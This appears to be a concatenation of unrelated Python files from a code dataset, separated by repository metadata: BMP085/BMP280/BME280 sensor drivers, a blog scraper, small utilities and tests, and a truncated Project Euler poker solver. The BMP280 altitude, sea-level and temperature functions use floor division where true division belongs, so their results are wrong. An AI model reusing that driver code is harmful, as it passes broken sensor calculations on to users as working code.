# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Operating Modes
BMP085_ULTRALOWPOWER = 0
BMP085_STANDARD = 1
BMP085_HIGHRES = 2
BMP085_ULTRAHIGHRES = 3
# BMP085 Registers
BMP085_CAL_AC1 = 0xAA # R Calibration data (16 bits)
BMP085_CAL_AC2 = 0xAC # R Calibration data (16 bits)
BMP085_CAL_AC3 = 0xAE # R Calibration data (16 bits)
BMP085_CAL_AC4 = 0xB0 # R Calibration data (16 bits)
BMP085_CAL_AC5 = 0xB2 # R Calibration data (16 bits)
BMP085_CAL_AC6 = 0xB4 # R Calibration data (16 bits)
BMP085_CAL_B1 = 0xB6 # R Calibration data (16 bits)
BMP085_CAL_B2 = 0xB8 # R Calibration data (16 bits)
BMP085_CAL_MB = 0xBA # R Calibration data (16 bits)
BMP085_CAL_MC = 0xBC # R Calibration data (16 bits)
BMP085_CAL_MD = 0xBE # R Calibration data (16 bits)
BMP085_CONTROL = 0xF4
BMP085_TEMPDATA = 0xF6
BMP085_PRESSUREDATA = 0xF6
# Commands
BMP085_READTEMPCMD = 0x2E
BMP085_READPRESSURECMD = 0x34
class BMP085(object):
def __init__(self, mode=BMP085_STANDARD, address=BMP_I2CADDR, i2c=None, busnum=1, i2c_interface=None):
# Check that mode is valid.
if mode not in [BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, BMP085_ULTRAHIGHRES]:
raise ValueError('Unexpected mode value {0}. Set mode to one of ' +
'BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, or BMP085_ULTRAHIGHRES'.format(mode))
self._mode = mode
# Create I2C device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, busnum=busnum, i2c_interface=i2c_interface)
# Load calibration values.
self._load_calibration()
def _load_calibration(self):
self.cal_AC1 = self._device.readS16BE(BMP085_CAL_AC1) # INT16
self.cal_AC2 = self._device.readS16BE(BMP085_CAL_AC2) # INT16
self.cal_AC3 = self._device.readS16BE(BMP085_CAL_AC3) # INT16
self.cal_AC4 = self._device.readU16BE(BMP085_CAL_AC4) # UINT16
self.cal_AC5 = self._device.readU16BE(BMP085_CAL_AC5) # UINT16
self.cal_AC6 = self._device.readU16BE(BMP085_CAL_AC6) # UINT16
self.cal_B1 = self._device.readS16BE(BMP085_CAL_B1) # INT16
self.cal_B2 = self._device.readS16BE(BMP085_CAL_B2) # INT16
self.cal_MB = self._device.readS16BE(BMP085_CAL_MB) # INT16
self.cal_MC = self._device.readS16BE(BMP085_CAL_MC) # INT16
self.cal_MD = self._device.readS16BE(BMP085_CAL_MD) # INT16
def _load_datasheet_calibration(self):
# Set calibration from values in the datasheet example. Useful for debugging the
# temp and pressure calculation accuracy.
self.cal_AC1 = 408
self.cal_AC2 = -72
self.cal_AC3 = -14383
self.cal_AC4 = 32741
self.cal_AC5 = 32757
self.cal_AC6 = 23153
self.cal_B1 = 6190
self.cal_B2 = 4
self.cal_MB = -32767
self.cal_MC = -8711
self.cal_MD = 2868
def read_raw_temp(self):
"""Reads the raw (uncompensated) temperature from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READTEMPCMD)
time.sleep(0.005) # Wait 5ms
raw = self._device.readU16BE(BMP085_TEMPDATA)
return raw
def read_raw_pressure(self):
"""Reads the raw (uncompensated) pressure level from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READPRESSURECMD + (self._mode << 6))
if self._mode == BMP085_ULTRALOWPOWER:
time.sleep(0.005)
elif self._mode == BMP085_HIGHRES:
time.sleep(0.014)
elif self._mode == BMP085_ULTRAHIGHRES:
time.sleep(0.026)
else:
time.sleep(0.008)
msb = self._device.readU8(BMP085_PRESSUREDATA)
lsb = self._device.readU8(BMP085_PRESSUREDATA+1)
xlsb = self._device.readU8(BMP085_PRESSUREDATA+2)
raw = ((msb << 16) + (lsb << 8) + xlsb) >> (8 - self._mode)
return raw
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
UT = self.read_raw_temp()
# Datasheet value for debugging:
#UT = 27898
# Calculations below are taken straight from section 3.5 of the datasheet.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
temp = ((B5 + 8) >> 4) / 10.0
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
UT = self.read_raw_temp()
UP = self.read_raw_pressure()
# Datasheet values for debugging:
#UT = 27898
#UP = 23843
# Calculations below are taken straight from section 3.5 of the datasheet.
# Calculate true temperature coefficient B5.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
# Pressure Calculations
B6 = B5 - 4000
X1 = (self.cal_B2 * (B6 * B6) >> 12) >> 11
X2 = (self.cal_AC2 * B6) >> 11
X3 = X1 + X2
B3 = (((self.cal_AC1 * 4 + X3) << self._mode) + 2) // 4
X1 = (self.cal_AC3 * B6) >> 13
X2 = (self.cal_B1 * ((B6 * B6) >> 12)) >> 16
X3 = ((X1 + X2) + 2) >> 2
B4 = (self.cal_AC4 * (X3 + 32768)) >> 15
B7 = (UP - B3) * (50000 >> self._mode)
if B7 < 0x80000000:
p = (B7 * 2) // B4
else:
p = (B7 // B4) * 2
X1 = (p >> 8) * (p >> 8)
X1 = (X1 * 3038) >> 16
X2 = (-7357 * p) >> 16
p = p + ((X1 + X2 + 3791) >> 4)
return p
def read_altitude(self, sealevel_pa=101325.0):
"""Calculates the altitude in meters."""
# Calculation taken straight from section 3.6 of the datasheet.
pressure = float(self.read_pressure())
altitude = 44330.0 * (1.0 - pow(pressure / sealevel_pa, (1.0/5.255)))
return altitude
def read_sealevel_pressure(self, altitude_m=0.0):
"""Calculates the pressure at sealevel when given a known altitude in
meters. Returns a value in Pascals."""
pressure = float(self.read_pressure())
p0 = pressure / pow(1.0 - altitude_m/44330.0, 5.255)
return p0
# driver code for BMP280 (Guenter Quast, 2018)
# adapted vom code by Bastien Wirtz <[email protected]>
#
# Based on the Adafruit BMP280 Driver C++ driver and the BMP085 python lib.
# - https://github.com/adafruit/Adafruit_BMP280_Library
# - https://github.com/adafruit/Adafruit_Python_BMP
#
# Datasheet: https://www.adafruit.com/datasheets/BST-BMP280-DS001-11.pdf
# BMP280 Registers
BMP280_DIG_T1 = 0x88 # R Unsigned Calibration data (16 bits)
BMP280_DIG_T2 = 0x8A # R Signed Calibration data (16 bits)
BMP280_DIG_T3 = 0x8C # R Signed Calibration data (16 bits)
BMP280_DIG_P1 = 0x8E # R Unsigned Calibration data (16 bits)
BMP280_DIG_P2 = 0x90 # R Signed Calibration data (16 bits)
BMP280_DIG_P3 = 0x92 # R Signed Calibration data (16 bits)
BMP280_DIG_P4 = 0x94 # R Signed Calibration data (16 bits)
BMP280_DIG_P5 = 0x96 # R Signed Calibration data (16 bits)
BMP280_DIG_P6 = 0x98 # R Signed Calibration data (16 bits)
BMP280_DIG_P7 = 0x9A # R Signed Calibration data (16 bits)
BMP280_DIG_P8 = 0x9C # R Signed Calibration data (16 bits)
BMP280_DIG_P9 = 0x9E # R Signed Calibration data (16 bits)
BMP280_CONTROL = 0xF4
BMP280_RESET = 0xE0
BMP280_CONFIG = 0xF5
BMP280_PRESSUREDATA = 0xF7
BMP280_TEMPDATA = 0xFA
class BMP280(object):
def __init__(self, address=BMP_I2CADDR, i2c=None, busnum=1, i2c_interface= None):
# Adadfruit I2C interface
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address,
busnum = busnum, i2c_interface = i2c_interface)
if self._device.readU8(REG_ID) != BMP280_CHIPID:
raise Exception('Unsupported chip')
# Load calibration values.
self._load_calibration()
self._device.write8(BMP280_CONTROL, 0x3F)
def _load_calibration(self):
self.cal_t1 = int(self._device.readU16(BMP280_DIG_T1)) # UINT16
self.cal_t2 = int(self._device.readS16(BMP280_DIG_T2)) # INT16
self.cal_t3 = int(self._device.readS16(BMP280_DIG_T3)) # INT16
self.cal_p1 = int(self._device.readU16(BMP280_DIG_P1)) # UINT16
self.cal_p2 = int(self._device.readS16(BMP280_DIG_P2)) # INT16
self.cal_p3 = int(self._device.readS16(BMP280_DIG_P3)) # INT16
self.cal_p4 = int(self._device.readS16(BMP280_DIG_P4)) # INT16
self.cal_p5 = int(self._device.readS16(BMP280_DIG_P5)) # INT16
self.cal_p6 = int(self._device.readS16(BMP280_DIG_P6)) # INT16
self.cal_p7 = int(self._device.readS16(BMP280_DIG_P7)) # INT16
self.cal_p8 = int(self._device.readS16(BMP280_DIG_P8)) # INT16
self.cal_p9 = int(self._device.readS16(BMP280_DIG_P9)) # INT16
def _load_datasheet_calibration(self):
# Set calibration from values in the datasheet example. Useful for debugging the
# temp and pressure calculation accuracy.
self.cal_t1 = 27504
self.cal_t2 = 26435
self.cal_t3 = -1000
self.cal_p1 = 36477
self.cal_p2 = -10685
self.cal_p3 = 3024
self.cal_p4 = 2855
self.cal_p5 = 140
self.cal_p6 = -7
self.cal_p7 = 15500
self.cal_p8 = -14500
self.cal_p9 = 6000
def read_raw(self, register):
"""Reads the raw (uncompensated) temperature or pressure from the sensor."""
raw = self._device.readU16BE(register)
raw <<= 8
raw = raw | self._device.readU8(register + 2)
raw >>= 4
return raw
def _compensate_temp(self, raw_temp):
""" Compensate temperature """
t1 = (((raw_temp >> 3) - (self.cal_t1 << 1)) *
(self.cal_t2)) >> 11
t2 = (((((raw_temp >> 4) - (self.cal_t1)) *
((raw_temp >> 4) - (self.cal_t1))) >> 12) *
(self.cal_t3)) >> 14
return t1 + t2
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
raw_temp = self.read_raw(BMP280_TEMPDATA)
compensated_temp = self._compensate_temp(raw_temp)
temp = float(((compensated_temp * 5 + 128) >> 8)) // 100
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
raw_temp = self.read_raw(BMP280_TEMPDATA)
compensated_temp = self._compensate_temp(raw_temp)
raw_pressure = self.read_raw(BMP280_PRESSUREDATA)
p1 = compensated_temp - 128000
p2 = p1 * p1 * self.cal_p6
p2 += (p1 * self.cal_p5) << 17
p2 += self.cal_p4 << 35
p1 = ((p1 * p1 * self.cal_p3) >> 8) + ((p1 * self.cal_p2) << 12)
p1 = ((1 << 47) + p1) * (self.cal_p1) >> 33
if 0 == p1:
return 0
p = 1048576 - raw_pressure
p = (((p << 31) - p2) * 3125) // p1
p1 = (self.cal_p9 * (p >> 13) * (p >> 13)) >> 25
p2 = (self.cal_p8 * p) >> 19
p = ((p + p1 + p2) >> 8) + ((self.cal_p7) << 4)
return float(p // 256)
def read_altitude(self, sealevel_pa=101325.0):
"""Calculates the altitude in meters."""
# Calculation taken straight from section 3.6 of the datasheet.
pressure = float(self.read_pressure())
altitude = 44330.0 * (1.0 - pow(pressure // sealevel_pa, (1.0 // 5.255)))
return altitude
def read_sealevel_pressure(self, altitude_m=0.0):
"""Calculates the pressure at sealevel when given a known altitude in
meters. Returns a value in Pascals."""
pressure = float(self.read_pressure())
p0 = pressure // pow(1.0 - altitude_m // 44330.0, 5.255)
return p0
# driver code for BMP/E280,
# adapted from original code by Matt Hawkins
#--------------------------------------
## import smbus
from ctypes import c_short
from ctypes import c_byte
from ctypes import c_ubyte
# some helper functions
def getShort(data, index):
# return two bytes from data as a signed 16-bit value
return c_short((data[index+1] << 8) + data[index]).value
def getUShort(data, index):
# return two bytes from data as an unsigned 16-bit value
return (data[index+1] << 8) + data[index]
def getChar(data,index):
# return one byte from data as a signed char
result = data[index]
if result > 127:
result -= 256
return result
def getUChar(data,index):
# return one byte from data as an unsigned char
result = data[index] & 0xFF
return result
# Register Addresses
REG_DATA = 0xF7
REG_CONTROL = 0xF4
REG_CONFIG = 0xF5
REG_CONTROL_HUM = 0xF2
REG_HUM_MSB = 0xFD
REG_HUM_LSB = 0xFE
# Oversample setting - page 27
OVERSAMPLE_TEMP = 2
OVERSAMPLE_PRES = 2
MODE = 1
# Oversample setting for humidity register - page 26
OVERSAMPLE_HUM = 2
class BME280(object):
"""Class to represent the Bosch BMP280 temperature and pressure sensor
"""
def __init__(self, address=BMP_I2CADDR, i2c=None):
self.DEVICE = address
if i2c==None:
self.bus = smbus.SMBus(1) # Rev 2 Pi, Pi 2 & Pi 3 uses bus 1
# Rev 1 Pi uses bus 0
else:
self.bus = i2c
# initialise calibration constants from device
self.init()
def init(self):
self.bus.write_byte_data(self.DEVICE, REG_CONTROL_HUM, OVERSAMPLE_HUM)
control = OVERSAMPLE_TEMP<<5 | OVERSAMPLE_PRES<<2 | MODE
self.bus.write_byte_data(self.DEVICE, REG_CONTROL, control)
# Read blocks of calibration data from EEPROM
# See Page 22 data sheet
cal1 = self.bus.read_i2c_block_data(self.DEVICE, 0x88, 24)
cal2 = self.bus.read_i2c_block_data(self.DEVICE, 0xA1, 1)
cal3 = self.bus.read_i2c_block_data(self.DEVICE, 0xE1, 7)
# Convert byte data to word values
self.dig_T1 = getUShort(cal1, 0)
self.dig_T2 = getShort(cal1, 2)
self.dig_T3 = getShort(cal1, 4)
self.dig_P1 = getUShort(cal1, 6)
self.dig_P2 = getShort(cal1, 8)
self.dig_P3 = getShort(cal1, 10)
self.dig_P4 = getShort(cal1, 12)
self.dig_P5 = getShort(cal1, 14)
self.dig_P6 = getShort(cal1, 16)
self.dig_P7 = getShort(cal1, 18)
self.dig_P8 = getShort(cal1, 20)
self.dig_P9 = getShort(cal1, 22)
self.dig_H1 = getUChar(cal2, 0)
self.dig_H2 = getShort(cal3, 0)
self.dig_H3 = getUChar(cal3, 2)
self.dig_H4 = getChar(cal3, 3)
self.dig_H4 = (self.dig_H4 << 24) >> 20
self.dig_H4 = self.dig_H4 | (getChar(cal3, 4) & 0x0F)
self.dig_H5 = getChar(cal3, 5)
self.dig_H5 = (self.dig_H5 << 24) >> 20
self.dig_H5 = self.dig_H5 | (getUChar(cal3, 4) >> 4 & 0x0F)
self.dig_H6 = getChar(cal3, 6)
# Wait in ms (Datasheet Appendix B: Measurement time and current calculation)
wait_time = 1.25 + (2.3 * OVERSAMPLE_TEMP) + ((2.3 * OVERSAMPLE_PRES) + 0.575) + ((2.3 * OVERSAMPLE_HUM)+0.575)
time.sleep(wait_time/1000) # Wait the required time
def readAll(self):
# Read temperature/pressure/humidity
data = self.bus.read_i2c_block_data(self.DEVICE, REG_DATA, 8)
pres_raw = (data[0] << 12) | (data[1] << 4) | (data[2] >> 4)
temp_raw = (data[3] << 12) | (data[4] << 4) | (data[5] >> 4)
hum_raw = (data[6] << 8) | data[7]
#Refine temperature
var1 = ((((temp_raw>>3)-(self.dig_T1<<1)))*(self.dig_T2)) >> 11
var2 = (((((temp_raw>>4) - (self.dig_T1)) * ((temp_raw>>4) - (self.dig_T1))) >> 12) * (self.dig_T3)) >> 14
t_fine = var1+var2
t = float(((t_fine * 5) + 128) >> 8);
# Refine pressure and adjust for temperature
var1 = t_fine / 2.0 - 64000.0
var2 = var1 * var1 * self.dig_P6 / 32768.0
var2 = var2 + var1 * self.dig_P5 * 2.0
var2 = var2 / 4.0 + self.dig_P4 * 65536.0
var1 = (self.dig_P3 * var1 * var1 / 524288.0 + self.dig_P2 * var1) / 524288.0
var1 = (1.0 + var1 / 32768.0) * self.dig_P1
if var1 == 0:
p=0
else:
p = 1048576.0 - pres_raw
p = ((p - var2 / 4096.0) * 6250.0) / var1
var1 = self.dig_P9 * p * p / 2147483648.0
var2 = p * self.dig_P8 / 32768.0
p = p + (var1 + var2 + self.dig_P7) / 16.0
# Refine humidity
h = t_fine - 76800.0
h = (hum_raw - (self.dig_H4 * 64.0 + self.dig_H5 / 16384.0 * h))
h = h * (self.dig_H2 / 65536.0 * (1.0 + self.dig_H6 / 67108864.0 * h * (1.0 + self.dig_H3 / 67108864.0 * h)))
h = h * (1.0 - self.dig_H1 * h / 524288.0)
if h > 100:
h = 100
elif h < 0:
h = 0.
return t/100.0, p/100, h
| 37.572973 | 115 | 0.625713 |
bf281cd951d471f8f3251ddfdd7f8a3865f06533
| 997 |
py
|
Python
|
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | 2 |
2022-02-09T14:02:59.000Z
|
2022-03-23T11:50:47.000Z
|
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | null | null | null |
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | null | null | null |
import urllib2
from bs4 import BeautifulSoup
import sys
import datetime
for year in range(2006, datetime.datetime.now().year+1):
yearposts=[]
for page in range(1, 1000):
url='http://bit-player.org/{}/page/{}'.format(year, page)
req=urllib2.Request(url, headers={'User-Agent' : "Firefox"})
try:
con=urllib2.urlopen(req)
except urllib2.HTTPError, e:
break
data=con.read()
soup=BeautifulSoup(data, 'html.parser')
posts=soup.find_all(class_="post")
for p in posts:
title=p.find_all(class_="entry-title")[0].a.text
link=p.find_all(class_="entry-title")[0].a.get('href')
meta=p.find_all(class_="entry-meta")
author=p.find_all(class_="entry-meta")[0].find_all(class_='author')[0].a.text
date=p.find_all(class_="entry-meta")[0].find_all(class_='entry-date')[0].text
entry='* [{}]({}) ({}, {})'.format(title.encode('utf_8'), str(link), str(author), str(date))
yearposts.append(entry)
print('\n### {}\n'.format(year))
for t in reversed(yearposts):
print(t)
| 34.37931 | 95 | 0.677031 |
171490bbc4b54039d8da2749936c53a0a9bbab76
| 669 |
py
|
Python
|
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
UNIVERSIDAD DE CONCEPCION
Departamento de Ingenieria Informatica y
Ciencias de la Computacion
Memoria de Titulo Ingenieria Civil Informatica
DETECCION DE BORDES EN IMAGENES DGGE USANDO UN
SISTEMA HIBRIDO ACO CON LOGICA DIFUSA
Autor: Sebastian Ignacio Espinoza Jimenez
Patrocinante: Maria Angelica Pinninghoff Junemann
"""
import MainWindow as mw
import sys
from PyQt4 import QtGui as gui
def main():
app = gui.QApplication(sys.argv)
qIcon = gui.QIcon('resources\\icon.png')
app.setWindowIcon(qIcon)
mainWindow = mw.MainWindow()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 23.892857 | 50 | 0.715994 |
da0b4162359d7b9c3db5245a001e7bac5fff4082
| 247 |
py
|
Python
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import gast as ast
import beniget
mod = ast.parse("""
T = int
def func() -> T:
return 1
""")
fdef = mod.body[1]
node = fdef.returns
du = beniget.DefUseChains()
du.visit(mod)
du.chains[node]
ud = beniget.UseDefChains(du)
ud.chains[node]
| 11.227273 | 29 | 0.659919 |
da39dee0899ff76b9c89c9b7001253e79c5c01fc
| 958 |
py
|
Python
|
SPS-Variants/backup/top-k-overview/backup/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | 8 |
2020-04-14T23:17:00.000Z
|
2021-06-21T12:34:04.000Z
|
related_projects/source_codes/top-k-overview/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | null | null | null |
related_projects/source_codes/top-k-overview/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | 1 |
2021-01-17T16:26:50.000Z
|
2021-01-17T16:26:50.000Z
|
import networkx as nx
import sys
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'Usage: genData <graphType [SF, ER]> <nodeNum> <perIndegree>'
sys.exit(1)
nodeN = int (sys.argv[2])
inDeg = int (sys.argv[3])
gtype = str (sys.argv[1])
graph_name = gtype + str(nodeN) + '-' + str(inDeg) + '.data'
if gtype == 'ER':
print gtype
G = nx.random_graphs.erdos_renyi_graph(nodeN, 1.0 * inDeg / nodeN, None, True)
elif gtype == 'WS':
G = nx.random_graphs.watts_strogatz_graph(nodeN, inDeg, 0.3)
elif gtype == 'SF':
g = nx.empty_graph(100);
print g
# G = nx.scale_free_graph(nodeN, 0.49, 0.50, 0.01, 0.2, 0, create_using = g)
elif gtype == 'BA':
G = nx.barabasi_albert_graph(nodeN, inDeg)
else:
print 'invalid graph type. Valid ones are [ER, WS, SF]'
sys.exit(1)
print '------'
nx.write_edgelist(G, graph_name, data = False)
| 34.214286 | 86 | 0.577244 |
da70277ecbcd81adab1f454b961d582f033746d9
| 2,014 |
py
|
Python
|
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
import os
import sys
import pyperclip
def find_file(directory, file_name):
for root, dirs, files in os.walk(directory):
for basename in files:
if file_name in basename:
extension = basename.split('.')
extension = extension[len(extension) - 1]
fl_name = basename.replace(f'.{extension}', "")
return root, basename, fl_name, extension
def generate_latex():
try:
if sys.argv and len(sys.argv) > 1:
out = None
print("INFO: found argument ", sys.argv[1])
cur_path = os.path.dirname(os.path.abspath(__file__))
file_name = input()
if "-c" in sys.argv[1]:
new_path = f"{cur_path}/code"
basepath, full, short, ext = find_file(
new_path, file_name.strip())
short_basepath = basepath.replace(new_path, "")
short_basepath_and_file = f'code{short_basepath}/{full}'
out = f'\codefull{{code:{short}}}{{XXXXX}}{{{ext}}}{{{short_basepath_and_file}}}'
elif "-a" in sys.argv[1]:
new_path = f"{cur_path}/abb"
basepath, full, short, ext = find_file(
new_path, file_name.strip())
short_basepath = basepath.replace(new_path, "")
short_basepath_and_file = f'abb{short_basepath}/{short}'
out = f'\\begin{{figure}}[H]\n\t\\centering\n\t\\includegraphics[width=1.0\\textwidth]{{{short_basepath_and_file}}}\n\t\\caption{{XXXXXX}}\n\t\\label{{img:{short}}}\n\\end{{figure}}'
else:
print(f"ERROR: INVALID ARGUMENT, -a for images, -c for code")
return
print("----------------")
print(out)
print("----------------")
pyperclip.copy(out)
else:
print(f"ERROR: NO ARGUMENT FOUND")
except Exception:
print(f"ERROR: NO FILE FOUND")
generate_latex()
| 38.730769 | 198 | 0.531281 |
daf811fb4627374f08ea73bd18f5a54f1547e28c
| 300 |
py
|
Python
|
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
import collections, sys
if __name__ == '__main__':
A = sys.stdin.readline().strip()
B = sys.stdin.readline().strip()
a = collections.Counter(A)
b = collections.Counter(B)
length = sum(min(a[c], b[c]) for c in (set(A) & set(B)))
print((len(A) - length) + (len(B) - length))
| 25 | 60 | 0.59 |
97be418b689a696d71dd3d357d24703a7a55af3f
| 1,370 |
py
|
Python
|
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | null | null | null |
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | 5 |
2019-03-19T22:21:28.000Z
|
2020-09-16T03:08:56.000Z
|
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime, timezone
from tests.books import AbstractTestBook, Book
class CreateBooksSuite(AbstractTestBook):
def setUp(self):
self._ISBN = '978-0618968633'
def tearDown(self):
key = self._client.key(self._kind, self._ISBN)
self._client.delete(key)
def testCreate(self):
expected_book_entity = {
'title': 'The Hobbit',
'language': 'English',
'pages': 320,
'author': {
'name': 'J.R.R. Tolkien'
},
'released_at': datetime(2007, 9, 17, tzinfo=timezone.utc)
}
books_model = Book()
book_handler = books_model.create(self._ISBN)
for key, value in expected_book_entity.items():
book_handler[key] = value
book_handler.put()
book_entity = books_model.get(self._ISBN)
self.assertEqual(book_entity.id, self._ISBN)
for key, value in expected_book_entity.items():
self.assertEqual(book_entity[key], value)
def testCreateWrongSchema(self):
input_entity = {
'title': 'The Hobbit',
'language': 'English',
'pages': 320,
'author.name1': 'J.R.R. Tolkien',
'released_at': '2007-09-17T00:00:00Z'
}
books_model = Book()
book_handler = books_model.create(self._ISBN)
for key, value in input_entity.items():
book_handler[key] = value
with self.assertRaises(Exception):
book_handler.put()
| 27.959184 | 63 | 0.651825 |
c14a8b7609e410aa3047a1fea7a1b58cccdf07be
| 359 |
py
|
Python
|
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | 1 |
2019-07-05T03:42:17.000Z
|
2019-07-05T03:42:17.000Z
|
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | null | null | null |
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | 1 |
2019-06-24T05:56:55.000Z
|
2019-06-24T05:56:55.000Z
|
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0, 10, 1000)
y = np.sin(x)
z = np.cos(x**2)
plt.figure(figsize=(8, 4))
plt.plot(x, y, label="$sin(x)$", color="red", linewidth=2)
plt.plot(x, z, "b--", label="$cos(x^2)$")
plt.xlabel("Time(s)")
plt.ylabel("Volt")
plt.title("matplotlib example")
plt.ylim(-1.2, 1.2)
plt.legend()
plt.show()
| 19.944444 | 58 | 0.635097 |
c15fb5cec0b5bcaf2823ab5f0b1bb6defefa7f3d
| 10,555 |
py
|
Python
|
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | 1 |
2020-02-11T02:03:02.000Z
|
2020-02-11T02:03:02.000Z
|
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | null | null | null |
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | null | null | null |
#Project Euler Question 54
#Poker hands
poker_file = open(r"C:\Users\Clayton\Documents\Python Other Files\p054_poker.txt")
content = poker_file.read()
content = content.replace(" ", "")
content = content.split("\n")
card_values = {"2": 2, "3": 3, "4": 4, "5": 5, "6": 6, "7": 7, "8": 8, "9": 9, "T": 10, "J": 11, "Q": 12, "K": 13, "A": 14}
def royal_flush(hand, suits):
if len(suits) == 1:
pass
else:
return []
royal_values = ["T", "J", "Q", "K", "A"]
for value in royal_values:
if value in hand:
pass
else:
return []
return ["A"]
def straight_flush(hand, suits):
if len(suits) == 1:
pass
else:
return []
hand = [card_values[card] for card in hand]
hand.sort()
c1 = 1
